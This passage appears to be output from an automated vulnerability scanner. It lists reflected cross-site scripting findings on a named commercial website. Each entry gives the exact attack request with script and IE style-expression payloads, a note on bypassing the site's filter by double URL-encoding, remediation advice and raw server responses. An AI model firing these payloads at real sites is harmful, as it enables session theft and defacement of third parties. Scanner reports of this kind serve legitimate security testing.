This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?id=74b82"><script>alert(1)</script>2e1c8977753 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.158. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/reviews
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadb8"><script>alert(1)</script>9e1a39efb8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?dadb8"><script>alert(1)</script>9e1a39efb8f=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.159. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/reviews
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2401f"><script>alert(1)</script>0614465aa10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?2401f"><script>alert(1)</script>0614465aa10=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1 was submitted in the REST URL parameter 1. This input was echoed as c202c"style="x:expression(alert(1))"1983cde1eb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /productc202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:44 GMT Content-Length: 8760 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/ Set-Cookie: ASP.NET_SessionId=yytjsqjo2ynqqa55mlvyit45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0 was submitted in the REST URL parameter 1. This input was echoed as a6214"style="x:expression(alert(1))"a8713ae88e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=g5orivnknoeu3mnalqm5ky2h; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8711 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a was submitted in the REST URL parameter 2. This input was echoed as 9a64e"style="x:expression(alert(1))"79d9addfb9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: ASP.NET_SessionId=4ccossevexhpky454jv13azr; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8739 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e was submitted in the REST URL parameter 2. This input was echoed as e7026"style="x:expression(alert(1))"d34dba31b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/x22e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:53 GMT Content-Length: 8760 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: ASP.NET_SessionId=5ppvdnq4c02bbb55spc4py55; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.164. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 146c3"style="x:expression(alert(1))"5d5d2fc8c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/x22?146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: ASP.NET_SessionId=uaszcl55vdwks2faid1tcq45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.165. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbd65"style="x:expression(alert(1))"a43b560b887 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/x22?fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/ Set-Cookie: ASP.NET_SessionId=k3dxer55b03zcg45gc2kh5b5; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1 was submitted in the REST URL parameter 2. This input was echoed as 80d8a"style="x:expression(alert(1))"b9c460ef3f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8774 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gvwmqnneobzhy02artx2kqbp; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f was submitted in the REST URL parameter 2. This input was echoed as a1cdd"style="x:expression(alert(1))"48d79440d3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/ Set-Cookie: ASP.NET_SessionId=b00pwu55pf2clt55u0k5o0rq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.168. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/diagram.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d74b"><script>alert(1)</script>7dda0913f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/diagram.asp/x22?8d74b"><script>alert(1)</script>7dda0913f6b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.169. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/diagram.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932a"><script>alert(1)</script>9f207111f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/diagram.asp/x22?f932a"><script>alert(1)</script>9f207111f3=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32 was submitted in the REST URL parameter 2. This input was echoed as fb652"style="x:expression(alert(1))"3dd903a5e32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: ASP.NET_SessionId=zbprv0455f2woe45n1vggnmm; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8 was submitted in the REST URL parameter 2. This input was echoed as 9b7f6"style="x:expression(alert(1))"722649758a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/ Set-Cookie: ASP.NET_SessionId=n40tt5554keayxr2thqf5345; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.172. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/floorplans.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86b"><script>alert(1)</script>3870aea577b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/floorplans.asp/x22?be86b"><script>alert(1)</script>3870aea577b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.173. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/floorplans.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43486"><script>alert(1)</script>d3e5d5a301c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/floorplans.asp/x22?43486"><script>alert(1)</script>d3e5d5a301c=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db was submitted in the REST URL parameter 2. This input was echoed as 3212f"style="x:expression(alert(1))"de74a7c05db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gfjqohyflklzjc3jlpnhf155; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f was submitted in the REST URL parameter 2. This input was echoed as 77d5c"style="x:expression(alert(1))"e0eacf7515f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ivhntdeja4wz04jdiflpz5ap; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.176. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/flowchart.asp/x22
Issue detail
